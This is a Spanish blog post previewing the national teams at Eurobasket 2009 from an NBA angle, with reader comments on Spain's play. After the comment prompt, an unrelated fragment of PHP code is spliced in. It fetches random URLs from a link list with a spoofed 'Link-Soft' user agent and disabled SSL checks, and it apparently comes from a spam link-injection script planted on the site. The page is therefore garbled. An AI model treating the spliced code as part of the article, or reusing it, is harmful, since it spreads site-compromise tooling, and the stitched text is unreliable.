Asalto al Eurobasket 2009

05 de September de 2009 por TheDeerHunter

Este próximo lunes la selección española de baloncesto inicia un nuevo intento de hacerse con el preciado campeonato de Europa, tradicionalmente una de las competiciones baloncestísticas más complicadas por el nivel medio de casi todos los participantes. Quitando a los USA y a los argentinos, están todos… bueno y quitando a una Italia tan venida a menos. Este año, no obstante, las bajas son la constante en la mayoría de los equipos. Será buen momento para conocer nuevas figuras.

Hacemos un repasito a los participantes, desde el punto de vista NBA que es lo que a nosotros más nos interesa:

GRUPO A

CROACIA: El jugador de los Raptors Roko-Leni Ukic es el único representante NBA del equipo. Representa un poco el perfil de esta selección: talento un tanto disperso. Es un equipo que te la puede armar como ya pudimos comprobar en el último Europeo pero son inconsistentes hasta casi lo imprevisible. Aún con la baja de Marko Tomas, se les queda un equipo bastante apañado con los Planinic, Popovic, Kus o Rancic por fuera y Vjucic, Kasun, Stojic, Tomic y Markota de frontcourt. Con todo vemos difícil que pasen de top 8.

GRECIA: Los griegos siempre son duros aunque a priori éste no debería ser su año ya que sin Diamantidis ni Papaloukas han perdido a sus dos primeras espadas. Si estará el ex Rocket Spanoulis y vuelve “Baby Shaq” Schortsanitis podiéndose mover y todo. Serán los jóvenes Koufos y Calathes quienes tendrán que dar el paso al frente con la calidad que se les presupone. Para mí que serán primeros de grupo, pero entiendo que este año no deberían de pasar de cuartos.

ISRAEL: Ya hemos visto algún palizón de los que se ha llevado este equipo en su preparación. No cuentan con ningún NBA y construídos alrededor del Olimpiakos Halperin y los Maccabbi Green o Eliyahu junto al eterno Tapiro, es posible que pasen la primera fase.

MACEDONIA: La cenicienta del grupo. Aún liderados por Ilievski y Pero Antik, junto con el “añorado” ex madridista Jeremiah Massey, no se van a comer un “torrao”.

GRUPO B

ALEMANIA: El panorama post-Nowitzki se antoja desolador. Lo van a pasar muy mal en el grupo (a priori) de la muerte. Jagla tendrá que dar un paso al frente apoyado en la vieja guardia de los Femerling, Greene o Hamann. No invitan a uno a pegarse con nadie por ver sus partidos. Más bien por no verlos…

FRANCIA: Clasificados en la repesca, cuentan con una batería de jugadores NBA que impresiona. Al final sí estará Tony Parker que debería de ser una de las estrellas de la competición. Después cuentan con músculo a raudales en los Diaw, Turiaf (que por lo visto se salió en la repesca), Batum, Diawara, Petro, Ajinca y el inédito Spur Ian Mahinmi. Con tanto chico fuerte no deberían lamentar la baja de Mickael Pietrus. Sí estará en cambio su hermano Florent, junto a otros ilustres veteranos como Gomis o Foirest. Además importantes nuevas incorporaciones como Nando de Colo y Bokolo. Un equipo muy peligroso pero algo vulnerable frente a un juego interior poderoso. Será un Top 4 casi con total seguridad y no deberían renunciar a nada.

LETONIA: Uno de los gallitos de la competición. Entre todos ellos brilla Andris Biedrins, que viene de hacer una buena campaña y lo suele hacer todavía mejor con su selección. Le acompaña dentro Kambala en un juego interior bastante potente. Después están los siempre peligrosos Kristaps y Sanders Valters, Janicenoks o Janis Blums. A priori son un top 8, pero no me extrañaría nada que le dieran un susto a más de uno.

RUSIA: Indudablemente las ausencias de Kirilenko y Holden podrían ser un hándicap (cada vez tengo más dudas de ello) y seguro que saldrán sin demasiada presión al campeonato. Pero el núcleo duro del CSKA y el Khimki encabezados por Viktor Khryapa, Monya, Alexander Kaun y Kelly McCarty no le van a regalar nada a nadie. Su objetivo debería de ser el top 8 pero no descartaría que se metan en la pomada.

GRUPO C

ESLOVENIA: Otro de los gallos. Un equipo tradicionalmente un tanto caótico y poco consistente, pero que este año los vemos más serios que nunca. Sin Vujacic, cortado por bajo rendimiento, tiene una interesante combinación de NBAs y buenos elementos de las grandes ligas Europeas. Brezec, los Lorbek, los Udrih, Nahbar, Slokar, Smodis y Lakovic. Tienen recursos para aspirar a cualquier cosa. Han perdido este verano contra España o Lituania, pero sin alguna de sus piezas clave que sí estarán en Polonia. Fácilmente un top 8 sino un top 4. Conviene pillarles en la primera fase y después lo más tarde posible.

ESPAÑA: Bajas importantísimas por unos u otros motivos: Calderón, Carlos Jiménez, Fran, Sergio Rodríguez… y nos queda un equipo casi “Dream Team”. Los Gasol son sin ninguna duda el juego interior más potente del campeonato. La rotura fibrilar de última hora de Rudy Fernández podría representar algún contratiempo, pero seguimos contando con NBavarro, Reyes, Garbajosa, Ricky… una batería de jugadores por los que suspirarían cualquiera del resto de selecciones. No será un camino nada fácil, pero a priori es la gran favorita al campeonato.

GRAN BRETAÑA: Sin Luol Deng, ni Azubuike, el único representante NBA Mensa-Bonsu y los Archibald, Daniel Clark o Nick George no podrán hacer demasiado para pasar de la primera fase.

SERBIA: Se pretende cambiar este año el esperpento mostrado durante los últimos campeonatos. Sin tanta estrellita del “cazo mix” se trata de formar un equipo serio alrededor de Nenad Krstic, que tan buen impacto ha tenido en los Thunder al final de la campaña. Alrededor suyo intentarán cohesionar muchos jóvenes talentos que bien podrían devolver a Serbia a su estatus a medio plazo. Luka Bogdanovic, Erceg, Bojan Popovic, Perovic, Markovic, Marvan, Teodosic, Velickovic… son buenos ingredientes para, al menos, no seguir haciendo el ridículo. Sin embargo este no es su momento todaví

GRUPO D

BULGARIA: Muy complicado que pasen la primera fase. Videmov, Avramov, los hermanos Ivanov. Poquito más…

LITUANIA: Han mostrado ya algunas de sus armas. Aún sufriendo ausencias muy sensibles cuentan con un bloque ultra-competitivo y muy compensado. El ya ex NBA Linas Kleiza no es ni de lejos su principal arma. Jasaitis, Javtokas, Seibutis, Delininkaitis, los gemelos Lavrinovik… Artillería verdaderamente temible. Esta gente nace con un balón en sus manos y será muy difícil pararles. No bajarán del top 4.

POLONIA: Alrededor del “braguetazo” de Marcin Gortat han juntado un equipo correoso que puede plantar batalla en el candor de su plaza. Ya lo pudimos comprobar en nuestras carnes. El viejo conocido Maciej Lampe, Ignerski, Kitzinger… tratarán de hacer soñar al país durante el máximo tiempo posible.

TURQUÍA: Los turcos velan armas de cara a su propio mundial. Sin Okur les queda un equipo siempre talentoso liderado por el gran Turkoglu e Ilyasova. Sólo esos dos ya te pueden armar un cirio pero también está Tunceri, Erden… siempre peligrosos. De todas formas dudamos mucho que lleguen a semifinales.

Comenta

6 comentarios a esta entrada

  1. NBA LAKERS BLOG dice:
    #1

    Gran informe!

    Tremendo blog!

    Pasate por el nuestro 😉

    Un abrazo!

      Citar

  2. TheDeerHunter dice:
    #2

    Al final se caen Khryapa y Shasha Kaun por Rusia. Me temo que entonces lo tienen bien chungo para salir vivos de las liguillas.

      Citar

  3. TheDeerHunter dice:
    #3

    Pues de momento los Griegos se han comido con patatas a los Macedonios. 86 a 54. Partidazo de Spanoulis y de Bourosis… aunque le ha dado tiempo de aportar hasta el utillero. “El gran Sofo” también ha estado bien.
    Por Macedonia sólo Massey ha funcionado mínimamente.

    Rusia también se ha cargado a Letonia… pero se las ha visto bastante más putas

      Citar

  4. Txusma dice:
    #4

    Hombre, es q los macedonios ya venian con el acompañamiento de casa.

      Citar

  5. JAZMIN dice:
    #5

    Mientras que juguemos así de nerviosos, apretados, inestables….dejándonos robar los balones, no arriesgando tiros de 3…..y Pau Gasol fallando 7 tiros libres (uno detrás de otro) en un mismo partido…..no sé que estamos intentando jugar el Eurobasket……ya poidéis ir haciendo las maletas para no tener que correr a última hora….Lo siento mucho, he sufrido mucho viendo los partidos….no sois lo que fuistéis en el Mundial….a qué se debe?, no lo entiendo……

      Citar

  6. TheDeerHunter dice:
    #6

    Se habla mucho de varias cosas, con mayor o menor acierto.
    Particularmente creo que lo normal es que no se juegue como aquel mundial tan increíble… después de eso hasta parece que los dos subcampeonatos nos han sabido a muy poco. La realidad es que nunca se ha llegado a jugar como en Japón. No se debe de poner ese nivel como el mínimo… porque es directamente imposible que sea el mínimo. Así es como vienen las decepciones.

    Por desgracia es evidente que muchos miembros de la selección no atraviesan por un buen estado de forma… todo esto unido a la presión a la que se les somete (favoritos indiscutibles) provoca que nada salga a derechas. Los que están mal (alguno de ellos pilar fundamental) han contagiado del virus de la inseguridad al resto. La única solución hubiera sido que paulatinamente se hubiera recuperado el tono (de hecho eso parecía contra Eslovenia) en una competición tan corta esto es verdaderamente complicado. Si es posible una recuperación a mí no me cabe ninguna duda de que estos tíos lo encontrarán. Pensar que otros (con ciertas excepciones) hubieran logrado revertir la situación me parece bastante ilusorio. El problema no creo que sea que estos jugadores no valgan, ni que este modelo colectivo esté caduco.

    Las demás selecciones tampoco están para tirar cohetes, por cierto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>